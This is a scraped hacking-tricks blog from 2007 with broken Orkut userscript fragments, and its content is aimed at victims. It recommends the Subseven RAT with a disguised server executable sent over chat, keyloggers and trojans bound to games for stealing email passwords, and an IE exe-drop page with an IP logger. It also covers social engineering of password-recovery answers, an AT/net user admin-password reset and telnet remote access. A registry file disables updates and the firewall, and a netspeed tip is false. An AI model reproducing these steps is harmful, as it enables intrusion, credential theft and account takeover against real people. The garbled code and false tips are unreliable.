function dot() {e=getTextArea();e.value="[b]"+"("+String.fromCharCode(773)+String.fromCharCode(818)+":"+String.fromCharCode(773)+String.fromCharCode(818)+":"+String.fromCharCode(773)+String.fromCharCode(818)+""+e.value.replace(//g,String.fromCharCode(773)+String.fromCharCode(818))+""+String.fromCharCode(773)+String.fromCharCode(818)+":"+String.fromCharCode(773)+String.fromCharCode(818)+":"+String.fromCharCode(773)+String.fromCharCode(818)+")";}
//-----------------------------------------------------------//-- Written links --//-----------------------------------------------------------function BhavikWrite() {text=getTextArea();if (!text) return;c=text.parentNode;d=document.createElement("div");d.className="T";d.style.fontSize="11px";d.align="left";
d.innerHTML=""+String.fromCharCode(1074)+String.fromCharCode(1085)+String.fromCharCode(945)+String.fromCharCode(957)+String.fromCharCode(953)+String.fromCharCode(954)+String.fromCharCode(38)+String.fromCharCode(961)+String.fromCharCode(1075)+String.fromCharCode(945)+String.fromCharCode(964)+String.fromCharCode(949)+String.fromCharCode(949)+String.fromCharCode(954)+" All In One !!!";d.style.marginTop="10px";c.appendChild(d);
zp=document.createElement("a");zp.href="javascript:;";zp.innerHTML="Encrypt or Decrypt";zp.addEventListener("click", ZP, true);d.appendChild(zp);
SPA=document.createElement("b");SPA.innerHTML=" - ";d.appendChild(SPA);
mm=document.createElement("a");mm.href="javascript:;";mm.innerHTML="aLtErNaTe";mm.addEventListener("click", mM, true);d.appendChild(mm);
SPB=document.createElement("b");SPB.innerHTML=" - ";d.appendChild(SPB);
ce=document.createElement("a");ce.href="javascript:;";ce.innerHTML="Lines";ce.addEventListener("click", cerc, true);d.appendChild(ce);
SPC=document.createElement("b");SPC.innerHTML=" - ";d.appendChild(SPC);
ss=document.createElement("a");ss.href="javascript:;";ss.innerHTML=String.fromCharCode(353)+String.fromCharCode(964)+String.fromCharCode(947)+String.fromCharCode(108)+String.fromCharCode(949);ss.addEventListener("click", stl, true);d.appendChild(ss);
SPD=document.createElement("b");SPD.innerHTML=" - ";d.appendChild(SPD);
s2=document.createElement("a");s2.href="javascript:;";s2.innerHTML=String.fromCharCode(0xA7)+String.fromCharCode(964)+String.fromCharCode(947)+String.fromCharCode(108)+String.fromCharCode(949);s2.addEventListener("click", ZPs, true);d.appendChild(s2);
SPE=document.createElement("b");SPE.innerHTML=" - ";d.appendChild(SPE);
color=document.createElement("a");color.href="javascript:;";color.innerHTML="Colorfull";color.addEventListener("click", colorful, true);d.appendChild(color);
SPE=document.createElement("b");SPE.innerHTML=" - ";d.appendChild(SPE);
bo=document.createElement("a");bo.href="javascript:;";bo.innerHTML="["+String.fromCharCode(773)+String.fromCharCode(818)+"B"+String.fromCharCode(773)+String.fromCharCode(818)+"o"+String.fromCharCode(773)+String.fromCharCode(818)+"x"+String.fromCharCode(773)+String.fromCharCode(818)+"]";bo.addEventListener("click", box, true);d.appendChild(bo);
SPE=document.createElement("b");SPE.innerHTML=" - ";d.appendChild(SPE);
he=document.createElement("a");he.href="javascript:;";he.innerHTML="("+String.fromCharCode(9829)+String.fromCharCode(773)+String.fromCharCode(818)+"H"+String.fromCharCode(773)+String.fromCharCode(818)+"e"+String.fromCharCode(773)+String.fromCharCode(818)+"a"+String.fromCharCode(773)+String.fromCharCode(818)+"r"+String.fromCharCode(773)+String.fromCharCode(818)+"t"+String.fromCharCode(773)+String.fromCharCode(818)+String.fromCharCode(9829)+")";he.addEventListener("click", hea, true);d.appendChild(he);
SPE=document.createElement("b");SPE.innerHTML=" - ";d.appendChild(SPE);
dt=document.createElement("a");dt.href="javascript:;";dt.innerHTML="("+String.fromCharCode(773)+String.fromCharCode(818)+String.fromCharCode(58)+String.fromCharCode(773)+String.fromCharCode(818)+String.fromCharCode(58)+String.fromCharCode(773)+String.fromCharCode(818)+"B"+String.fromCharCode(773)+String.fromCharCode(818)+"a"+String.fromCharCode(773)+String.fromCharCode(818)+"n"+String.fromCharCode(773)+String.fromCharCode(818)+"d"+String.fromCharCode(773)+String.fromCharCode(818)+"-"+String.fromCharCode(773)+String.fromCharCode(818)+"A"+String.fromCharCode(773)+String.fromCharCode(818)+"i"+String.fromCharCode(773)+String.fromCharCode(818)+"d"+String.fromCharCode(58)+String.fromCharCode(773)+String.fromCharCode(818)+String.fromCharCode(58)+String.fromCharCode(773)+String.fromCharCode(818)+")";dt.addEventListener("click", dot, true);d.appendChild(dt);}
BhavikWrite();}, false);
//-----------------------------------------------------------//-- Change Link to Image --//-----------------------------------------------------------
var i=0;function chngimg(){doc=document;lnk=doc.links;
for (i=0;igetload="document.getElementById('loadi"+i+"')"this2="document.getElementById('bfimg"+i+"')"
var sb=lnk[i].href.substring(lnk[i].href.length-4,lnk[i].href.length);sb=sb.toLowerCase()if(sb=='.jpg' sb=='.gif' sb=='.png' sb=='jpeg'){lnk[i].innerHTML="Loading....Image Not Found'\" oncontextmenu=\"if(aa"+i+"==0){if(imgh"+i+">imgw"+i+"){document.getElementById('bfimg"+i+"').height=imgh"+i+"};if(imgw"+i+">imgh"+i+"){document.getElementById('bfimg"+i+"').width=imgw"+i+"};aa"+i+"=1}else{if(this.height>200 && this.height>=this.width){this.height=200};if(this.width>200 && this.width>=this.height){this.width=200};aa"+i+"=0};return false\" src="+lnk[i].href+" style='display: none' id=bfimg"+i+" border=0 onload=\"aa"+i+"=0;imgh"+i+"=this.height;imgw"+i+"=this.width;if(this.height>200 && this.height>=this.width){this.height=200}else if(this.width>200 && this.width>=this.height){this.width=200;};this.style.display='';"+getload+".style.display='none';\">"}}}chngimg()
//-----------------------------------------------------------//-- Tags --//-----------------------------------------------------------function changetags(){br=document.body.innerHTMLif(br.indexOf("[img]") > -1 && br.indexOf("[/img]") > -1){br=br.replace(/\[img\]/gi,'');br=br.replace(/\[\/img\]/gi,'');document.body.innerHTML = br;}}changetags()
Posted by BAS at 10:32 PM 0 comments
Labels: funny script, orkut, orkut script, orkut tricks
Sunday, October 14, 2007Mobile hacker Yes guys it is the super mobile bluetooth hackerOnce connected to a another phone via bluetooth you can:- read his messages- read his contacts- change profile- play his ringtone even if phone is on silent- play his songs(in his phone)- restart the phone- switch off the phone- restore factory settings- change ringing volume- And here comes the bestCall from his phone" it includes all call functions like hold etc.Notes:1.) When connecting devices use a code 00002.) At start of programm on smartphones do not forget to turn on bluetooth before start of the applicationWhat else you wantJust go and downlaod itdownloadenjoy and keep visiting us
Posted by BAS at 8:38 PM 0 comments
Labels: Bluetooth hacking, bluetooth mobile hacking, hack any mobile, hack bluetooth, hack mobile, Mobile hacker, Mobile hacking
Saturday, October 13, 2007Remote Access software Many of u may find it difficult to hack pc's with previous methods which I described hereSo there is a good news for uU can use this software for remote access to your friend's pc

Download subseven
This one is really good software for remote access
It is having great features like KEYLOGGER , REMOTE ACCESS , FTP in it which u will not find any other software you can do anything with victim's pc remotely after running ist me.exe in victim's pcist me.exe is given in this pack .Just run this file on victim's pc and do whatever you want with his pc remotelyYou can also use resource hacker to change ist me.exe's icon and make it attractive and send it to the victim while chatting on yahoo messenger or gtalkAnd if you hv direct access to his pc then just run this file on his pcThat's it.
Posted by BAS at 7:27 PM 3 comments
Labels: hack, hack a pc, hack while chatting, hacking, hacking a pc, how to hack a pc, remote access, remote access software, software for remote access, subseven
Friday, October 12, 2007SCAN YOUR FRIEND'S PC FOR OPEN PORTS AND HACK IT THROUGH THIS PORTS Through my previous posts you may hv learnt how to track Ip of your friend's pcBut you don't know which ports are open in your friend's pc,so u r not able to hack pcHere I hv one simple solution for thathttp://rapidshare.com/files/62036500/Advanced_Port_Scanner.zipDownload this softwarerun this softwareIn select Ip textbox insert your friend's pc's IPDo not select the range optionScan the given IPIn 10 seconds it will give u the result and will show all open and closed ports in ur friends pcThat's itIt has done its work now it's your turnAttck the pc through the open ports
this trick will work only if your friend is having static ip
Posted by BAS at 9:33 PM 0 comments
Labels: hack a pc, hack while chatting, hacking, hacking a pc, how to hack a pc, how to scan ports, open ports, Ports, scan for open ports, Scan ports
Thursday, October 11, 2007See who is invisible on yahoo See who is invisible in yahoo messenger
download this[100% working]
http://rapidshare.com/files/61785563/BuddySpySetup.exeIf you r scanning for a person be sure that he/she is in your friends listIf he/she is not in your friends list then you may not get right result
enjoy
Posted by BAS at 4:38 PM 1 comments
Labels: buddy spy, find invisible peoples on yahoo messenger, see who is invisible in yahoo, spy your friends, yahoo messenger
Wednesday, October 10, 2007Hack PC while chatting I am not sure that this will work 100 %.But yes will work almost 70 percent of the times.But before that you need to know some few things of yahoo chat protocolleave a comment here after u see the post lemme know if it does works or not or u having a problem post here.
Following are the features : -
1) When we chat on yahoo every thing goes through the server.Only when we chat thats messages.2) When we send files yahoo has 2 optionsa) Either it uploads the file and then the other client has to down load it.Either it connects to the client directly and gets the files3) When we use video or audio:-a) It either goes thru the serverOr it has client to client connectionAnd when we have client to client connection the opponents IP is revealed.On the 5051 port.So how do we exploit the Chat user when he gets a direct connection. And how do we go about it.Remember i am here to hack a system with out using a TOOL only by simple net commands and yahoo chat techniques.Thats what makes a difference between a real hacker and new bies.So lets analyse1) Its impossible to get a Attackers IP address when you only chat.2) There are 50 % chances of getting a IP address when you send files3) Again 50 % chances of getting IP when you use video or audio.
So why to wait lets exploit those 50 % chances .I'll explain only for files here which lies same for Video or audio
1) Go to dostype ->netstat -n 3You will get the following output.Just do not care and be coolActive Connections
Proto Local Address Foreign Address StateTCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHEDTCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHEDTCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHEDTCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
Active Connections
Proto Local Address Foreign Address StateTCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHEDTCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHEDTCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHEDTCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
Just i will explain what the out put is in general.In left hand side is your IP address.And in right hand side is the IP address of the foreign machine.And the port to which is connected.Ok now so what next ->
2) Try sending a file to the Target .if the files comes from server.Thats the file is uploaded leave itYou will not get the ip.But if a direct connection is establishedHMMMM then the first attacker first phase is overThis is the output in your netstat.The 5101 number port is where the Attacker is connected.Active Connections
Proto Local Address Foreign Address StateTCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHEDTCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHEDTCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHEDTCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHEDTCP 194.30.209.15:5101 194.30.209.14:3290 ESTABLISHED
3) so what next???Hmmm........ Ok so make a DOS attack nowGo to dos prompt andJust donbtstat -A Attackers IPaddress.Can happen that if system is not protected then you can see the whole network.C:\>nbtstat -A 194.30.209.14
Local Area Connection:Node IpAddress: [194.30.209.15] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status---------------------------------------------EDP12 <00> UNIQUE RegisteredXYZ <00> GROUP RegisteredXYZ <20> UNIQUE RegisteredXYZCOMP1 <1e> GROUP Registered
MAC Address = 00-C0-W0-D5-EF-9A
What to do next??It is now ur job to tell me what u have done next...
So the conclusion is never exchange files , video or audio till you know that the user with whom you are chatting is not going to harm you.
Posted by BAS at 7:21 PM 0 comments
Labels: dos attack, hack, hack while chatting, hacking, hacking a pc, pc hacking, yahoo, yahoo hacking
Tuesday, October 9, 2007Login with multiple ids at the same time in yahoo messenger Multiple Login in Yahoo! by regedit
Follow these steps : ->
* Go to Start ==> Run ==>> Type regedit,hit enter
* Go to HKEY_CURRENT_USER -> Software -> Yahoo -> pager -> Test
* On the right pane ==>> right-click and choose new Dword value .
* Rename it as Plural.
* Double click and assign a decimal value of 1.
* Now close registry and restart yahoo messenger.
* For signing in with new id open another messenger .
☺ ☺ Enjoy ☺ ☺
Posted by BAS at 8:22 PM 2 comments
Labels: login with multiple ids, yahoo hacking, yahoo messenger
Monday, October 8, 2007Changing title of windows media player
You can change the title bar for the Windows Media Player
Start Regedit Go to HKEY_USERS \ .DEFAULT \ Software \ Policies \ Microsoft \ WindowsMediaPlayer Create a string value of TitleBar Give it a value of whatever you want to appear in the title bar
Posted by BAS at 8:53 PM 0 comments

Sunday, October 7, 2007HACK INTERNET EXPLORER & IMPRESS UR FRIENDS This is not a big trickJust for timepass
Go to start->runType regeditpress enterin registry editor go toHKEY_CURRENT_USER->Software->Microsoft->Internet explorer->mainthere u will find something like "windows title"double click on that and change the value data with anything u wantand click okpress F5restart ur internet explorersee the title of it
Posted by BAS at 7:32 PM 5 comments
Labels: internet explorer
Saturday, October 6, 2007Increase your netspeed
Increase your Netspeed

go to desktop->My computer-(right click on)->manage->->Device manager-> now u see a window of Device managerthen go to Ports->Communication Port(double click on it and Open).after open u can see a Communication Port properties.go the Port Setting:----and now increase ur "Bits per second" to 128000.and "Flow control" change 2 Hardware.
U WILL NOTICE AN IMMEDIATE RESULT
this will increase the receiving capacity of your input port and thus ur netspeed will be increased
Posted by BAS at 6:41 PM 1 comments
Labels: crack admin account, cracking, gmail hacking, hacks, increase surfing speed, increase ur browsing speed, net speed
Increase ur browsing speed Speed up your firefox browser and load pages about 20% faster than previous.
1. Type "about:config" into the address bar and hit return. Scroll down and look for the following entries:
network.http.pipeliningnetwork.http.proxy.pipeliningnetwork.http.pipelining.maxrequests
Normally the browser will make one request to a web page at a time. When you enable pipelining it will make several at once, which really speeds up page loading.
2. Alter the entries as follows:
Set "network.http.pipelining" to "true"
Set "network.http.proxy.pipelining" to "true"
Set "network.http.pipelining.maxrequests" to some number like 30. This means it will make 30 requests at once.
3. Lastly right-click anywhere and select New-> Integer. Name it "nglayout.initialpaint.delay" and set its value to "0". This value is the amount of time the browser waits before it acts on information it recieves.
If you're using a broadband connection you'll load pages 2-3 times faster now.
mozila net increase speed
Posted by BAS at 6:36 PM 3 comments
Labels: cracking, firefox, gmail hacking, hacking, increase ur browsing speed, mozilla, net speed
Friday, October 5, 2007Remote access method Just Control Another Computer Remotely.
Things tO NeedRemote Pc's Account Username And Password
<-- Method -->
1. Go tO COmmand Promt(press Windows+R and type cmd)2. type cd\ (to go to main root Of C:)3. type the commandc:\net use \\(Rempote PC's Username i.e Adrian)\ipc$ /u:Administratorc:\net use \\Adrian\ipc$ /u:Administrator(press Enter)(Results of the above Command)The Password Or Username Is Invalid For \\Adrian\ipc$.Enter The PassWord For "Administrator" tp connect to 'Adrian':*****The Command COmpleted Successfuly.4. Press Window+R Write regedit To Enter RegsitryEditor.5. Press Alt+F Then C.6. Write Down The "Object's Name".Adrian(Computer's Username)then Press Enter.(New Computer's Registry Is Successsfully Accessed).7. Just GO TOAdrian\HKEY_LOCAL_MACHINE\SFTWARE\Microsoft\Windows\TelnetServer\1.0On The Right Hand Double Click On The Key Named As "NTLM"(New BOx Appear)Value Name:NTLMValue Data:(Replace 2 with 0)Base :HexaDecimalPress OK.Get Out Of registry Editor.8. Again Press Windows+R And Write mmc.(Consol1 Will Open)9. Press Alt+F then M(New Windows Will Appear)10.Press Alt+D Then Double Click On "Computer Management"11.Select "another Computer" and write its Account Login(Adrian).12.Press Finish And Then Close The "Add StandALone Snap-in"Dialogue Box.13.Now Press OK Of "Add/Remove Snap-in".14.On The Left Hand Expand Computer Management>Select Services And Aplications>Services15.On The Right Hand Scroll down And Right CLick At "Telnet"And Select Restart Option.16.Leave It As It is17.Turn To Command Promt Writec:\telnet Adrian(Press Enter)it Will Require Login And PassWordLogin:AdministratorPassWord:********(Enter)*-----------------------------------------------------------Welcome TO Microsoft Telnet SErverC:dir(Enter)
Thats It!Enjoy With Kenreaves!!!
Posted by BAS at 6:12 PM 1 comments
Labels: computer, computers, cracking, cracks, hacking, hacks, pc hacking, registry, remote access, web hacking
Thursday, October 4, 2007mail hacking Hey friendsFirst of all thanks for making us fastest growing blog on bloggerI m back with some good tricks again
This topic is favourite of all newbiesEMAIL PASSWORD HACKINGFirst of all it is very difficult to crack any mail serverlike yahoo,google,msn etc.ANd even if you crack into their server it is not possible to decode the passwordso just forget abt this method We will try something different
If u have physical access(direct access) to someone's PC and u want to hack his account password then it is the best thing for us.U don't need anything better than that,all u hv to do is to download a good keylogger to ur pc and copy it in ur pendrive or cdand install the keylogger in the victim's pc.That's it.
KEYLOGGER:-This are the program which records the every keystrokes on keyboard which means it will record all passwords also.The data will be stored on the victims computer only(they r stored in one file which is usually located in system folder) but as u hv physical access u can access this file easilysome keyloggers are hidden so the victim will not hv ne clue abt it and ur work will be done easily
Most of u will say that u don't hv direct access to the victim's pc.It is little difficult to get password if u don't hv direct access to victim's pc.In this kinda situaions u can use trojan's for this.There r many trojans available on internet.U can find many just by googling.If u want u can scrap in my orkut profile.http://www.orkut.com/Profile.aspx?uid=18239363529693171422
Well of course most of you out there will say that you don't have physical access to your target's computer. That's fine, there still are ways you can gain access into the desired email account without having to have any sort of physical access. For this we are going to go back onto the RAT topic, to explain methods that can be used to fool the user into running the server portion of the RAT (again, a RAT is a trojan) of your choice. Well first we will discuss the basic "send file" technique. This is simply convincing the user of the account you want to access to execute the server portion of your RAT.
To make this convincing, what you will want to do is bind the server.exe to another *.exe file in order to not raise any doubt when the program appears to do nothing when it is executed. For this you can use the tool like any exe file to bind it into another program (make it something like a small game)...

On a side note, make sure the RAT of your choice is a good choice. The program mentioned in the previous section would not be good in this case, since you do need physical access in order to set it up. You will have to find the program of your choice yourself (meaning please don't ask around for any, people consider that annoying behavior).
If you don't like any of those, I'm afraid you are going to have to go to www.google.com, and look for some yourself. Search for something like "optix pro download", or any specific trojan. If you look long enough, among all the virus notification/help pages, you should come across a site with a list of RATs for you to use (you are going to eventually have to learn how to navigate a search engine, you can't depend on handouts forever). Now back to the topic at hand, you will want to send this file to the specified user through an instant messaging service.
The reason why is that you need the ip address of the user in order to connect with the newly established server. Yahoo! Messenger, AOL Instant Messenger, it really doesn't matter. What you will do is send the file to the user. Now while this transfer is going on you will go to Start, then Run, type in "command", and press Enter. Once the msdos prompt is open, type in "netstat -n", and again, press enter. You will see a list of ip addresses from left to right. The address you will be looking for will be on the right, and the port it's established on will depend on the instant messaging service you are using. With MSN Messenger it will be remote port 6891, with AOL Instant Messenger it will be remote port 2153, with ICQ it will be remote port 1102, 2431, 2439, 2440, or 2476, and with Yahoo! Messenger it will be remote port 1614.
So once you spot the established connection with the file transfer remote port, then you will take note of the ip address associated with that port. So once the transfer is complete, and the user has executed the server portion of the RAT, then you can use the client portion to sniff out his/her password the next time he/she logs on to his/her account.
Don't think you can get him/her to accept a file from you? Can you at least get him/her to access a certain web page? Then maybe this next technique is something you should look into.
Currently Internet Explorer is quite vulnerable to an exploit that allows you to drop and execute .exe files via malicious scripting within an html document. For this what you will want to do is set up a web page, make sure to actually put something within this page so that the visitor doesn't get too entirely suspicious, and then imbed the below script into your web page so that the server portion of the RAT of your choice is dropped and executed onto the victim's computer...

While you are at it, you will also want to set up an ip logger on the web page so that you can grab the ip address of the user so that you can connect to the newly established server. Here is the source for a php ip logger you can use on your page...
http://www.planet-source-code.com/vb/scripts/ShowCode.asp?txtCodeId=539&lngWId=8
Just insert this source into your page along with the exedrop script, and you are set. Just convince the user to go to this page, and wait till the next time they type in their email password. However, what do you do if you can not contact this user in any way to do any of the above tricks. Well, then you definately have your work cut out for you. It doesn't make the task impossible, but it makes it pretty damn close to it. For this we will want to try info cracking. Info cracking is the process of trying to gather enough information on the user to go through the "Forgot my Password" page, to gain access into the email account.
If you happen to know the user personally, then it helps out a lot. You would then be able to get through the birthday/ zipcode questions with ease, and with a little mental backtracking, or social engineering (talking) out the information from the user be able to get past the secret question. However, what do you do if you do not have this luxury? Well in this case you will have to do a little detective work to fish out the information you need.
First off, if a profile is available for the user, look at the profile to see if you can get any information from the profile. Many times users will put information into their profile, that may help you with cracking the account through the "Forgot my Password" page (where they live, their age, their birthday if you are lucky). If no information is provided then what you will want to do is get on an account that the user does not know about, and try to strike conversation with the user. Just talk to him/her for a little while, and inconspicuously get this information out of the user (inconspicuously as in don't act like you are trying to put together a census, just make casual talk with the user and every once in a while ask questions like "When is your birthday?" and "Where do you live?", and then respond with simple, casual answers).
Once you have enough information to get past the first page, fill those parts out, and go to the next page to find out what the secret question is. Once you have the secret question, you will want to keep making casual conversation with the user and SLOWLY build up to asking a question that would help you answer the secret question. Don't try to get all the information you need in one night or you will look suspicious. Patience is a virtue when info cracking. Just slowly build up to this question. For example, if the secret question is something like "What is my dog's name?", then you would keep talking with the user, and eventually ask him/her "So how many dogs do you have? ...Oh, that's nice. What are their names?". The user will most likely not even remember anything about his/her secret question, so will most likely not find such a question suspicious at all (as long as you keep it inconspicuous). So there you go, with a few choice words and a little given time, you have just gotten the user to tell you everything you need to know to break into his/her email account. The problem with this method is that once you go through the "Forgot my Password" page, the password will be changed, and the new password will be given to you. This will of course deny the original user access to his/her own account. But the point of this task is to get YOU access, so it really shouldn't matter. Anyways, that concludes it for this tutorial. Good luck...
Posted by BAS at 9:53 PM 0 comments
Labels: cracking, cracks, gmail hacking, hacking, hotmail hacking, how to crack into mail account of your friend, keyloggers, mail hacking, msn hacking, password, password hacking, pc hacking, yahoo hacking
Crack into admin acc from limited account(99.99% works) Go to cmd
type AT (time) /interactive “cmd.exe”
enter time in 24hr format
means if you want to enter 5.00pm then enter 17:00
then a new window of cmd will open at specified time
In new window type net(space)user
press enter
after this u will see some names on ur screen
notedown the name of admin acc
then type
net user (name of admin acc u want to crack into) *e.g if the name of admin acc is john then type
net user john *
then it will ask u for new password
enter password of ur choice
and u got the admin password
Posted by BAS at 6:26 PM 0 comments
Labels: admin password, administrator, crack admin account, cracking, hacking, password, password hacking, pc hacking, windows, windows xp
Wednesday, October 3, 2007All xp tricks hacks All xp tricks u can do with your xp Be careful this can harm your pc very badlyOne mistake and your system is gone
; Disclaimer: These tweaks MAY result in serious problems that may require; you to reinstall your operating system. I cannot guarantee that problems; resulting from modifications to the registry can be solved. Use this reg file; at your own risk.;; ** WARNING: Some of these tweaks may not be suitable for your system. Make sure; you go through the entire list below so that you may modify it according to; your system and your preferences.; In case you find a tweak that is not suitable or you plainly dont like it,; please do not delete it. Instead just comment it out like these notes here.;; Also, when adding your own tweaks, please follow the same format followed here.;; These tweaks have been compiled from a lot of sources on the web, magazines,; and from some tweaking programs themselves. Thanks for all those who have; contributed to this file!;;;---------------------------------------------------------------------------------;; ------------------------; Understanding this file:; ------------------------;; This reg file is divided into 9 sections:; 1 Windows Services; 2 Desktop Tweaks; 3 StartMenu and TaskBar Tweaks; 4 Explorer / System Tweaks; 5 System / Hardware Tweaks; 6 Visual Effects Tweaks; 7 Internet Explorer; 8 Security / Privacy Related; 9 Misc. Application Tweaks;;; Basic format / syntax :; ----------------------;; You can use the semi-colon not only to comment, but also to DISABLE unneeded,; unknown, or inapplicable tweaks. Its better to comment out a tweak with the;; instead of plainly deleting it so that it can be re-enabled by others incase; they require the tweak.;; For example, a standard tweak may look like this:;;;Disable Active Desktop; [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]; "NoActiveDesktop"=dword:00000001;; The first line is the description of the tweak which is obviously commented (;); The second line shows the registry key; The third line is the actual value/setting.;; The dword: stands for REG_DWORD type of keys and HAS to be in a 8 bit hex format; as shown above. Usually 00000001 means yes or true, and 00000000 means no/false.; To convert decimal (ordinary) values to hex, you can use the windows calculator; (scientific mode) to convert decimal->hex.;; Note: You can directly jump to the various sections of this file by simply; searching for the index number. Eg, if you search for (7/9), you'd directly; reach the internet explorer tweaks section.;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

;------(1/9)-------------------Windows Services--------------------------------------;; Note: Change the values to set the services to automatic, manual or disable;; 00000002 = Automatic; 00000003 = Manual; 00000004 = Disabled;; The following services have been set to disable by default
;Alerter[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Alerter]"Start"=dword:00000004
;Automatic Updates[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]"Start"=dword:00000004
;Background Intelligent Transfer Service[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS]"Start"=dword:00000004
;ClipBook[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ClipSrv]"Start"=dword:00000004
;Help and Support Service[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\helpsvc]"Start"=dword:00000004
;ICF/ICS[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]"Start"=dword:00000004
;IMAPI CD-Burning Service[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ImapiService]"Start"=dword:00000004
;Indexing Service[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CiSvc]"Start"=dword:00000004
;IPSEC[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PolicyAgent]"Start"=dword:00000004
;Messenger Service (to stop spam. Does not affect MSN or Windows Messenger)[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Messenger]"Start"=dword:00000004
;NVIDIA Helper Service[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NVSvc]"Start"=dword:00000004
;Performance Logs & Alerts[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SysmonLog]"Start"=dword:00000004
;Remote Desktop Help Session Manager[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RDSessMgr]"Start"=dword:00000004
;Remote Registry Service[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteRegistry]"Start"=dword:00000004
;Routing and Remote Access[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteAccess]"Start"=dword:00000004
;SSDP Discovery Service (Universal Plug'n'Play)[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SSDPSRV]"Start"=dword:00000003
;System Restore[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\srservice]"Start"=dword:00000004
;TCP/IP Helper[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LmHosts]"Start"=dword:00000004
;Universal Plug'n'Play Service[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\upnphost]"Start"=dword:00000003
;UPS[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UPS]"Start"=dword:00000004
;Windows Time Service[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time]"Start"=dword:00000004
;Wireless Zero Configuration[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WZCSVC]"Start"=dword:00000002
;------------------------------------------------------------------------------------
;--------(2/9)------------------Desktop Tweaks---------------------------------------
;Disable Active Desktop;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer];"NoActiveDesktop"=dword:00000001
;Disable ClearType;[HKEY_CURRENT_USER\Control Panel\Desktop];"FontSmoothing"="2";"FontSmoothingType"=dword:00000001
;Add "Services" to the right-click menu of "My Computer"[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\services]@=hex(2):53,00,65,00,72,00,76,00,69,00,63,00,65,00,73,00,00,00"SuppressionPolicy"=dword:4000003c[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\services\command]@=hex(2):25,00,77,00,69,00,6e,00,64,00,69,00,72,00,25,00,5c,00,73,00,79,00,73, 00,74,00,65,00,6d,00,33,00,32,00,5c,00,6d,00,6d,00,63,00,2e,00,65,00,78,00, 65,00,20,00,2f,00,73,00,20,00,25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52, 00,6f,00,6f,00,74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00, 32,00,5c,00,73,00,65,00,72,00,76,00,69,00,63,00,65,00,73,00,2e,00,6d,00,73, 00,63,00,20,00,2f,00,73,00,00,00
;Add "Computer Management" to the right-click menu of "My Computer"[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\services]@=hex(2):53,00,65,00,72,00,76,00,69,00,63,00,65,00,73,00,00,00"SuppressionPolicy"=dword:4000003c
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\services\command]@=hex(2):25,00,77,00,69,00,6e,00,64,00,69,00,72,00,25,00,5c,00,73,00,79,00,73,\00,74,00,65,00,6d,00,33,00,32,00,5c,00,6d,00,6d,00,63,00,2e,00,65,00,78,00,\65,00,20,00,2f,00,73,00,20,00,25,00,77,00,69,00,6e,00,64,00,69,00,72,00,25,\00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,00,65,00,\72,00,76,00,69,00,63,00,65,00,73,00,2e,00,6d,00,73,00,63,00,00,00
;Remove Shared Documents from My Computer[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"NoSharedDocuments"=dword:00000001
;Allow renaming and removing of Recycle Bin[HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder]"Attributes"=hex:70,10,00,20"CallForAttributes"=dword:00000040
;Remove Shortcut Arrows[HKEY_CLASSES_ROOT\lnkfile]"IsShortcut"=-
;Disables Windows Tour bubble popup[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Applets\Tour]"RunCount"=dword:00000000
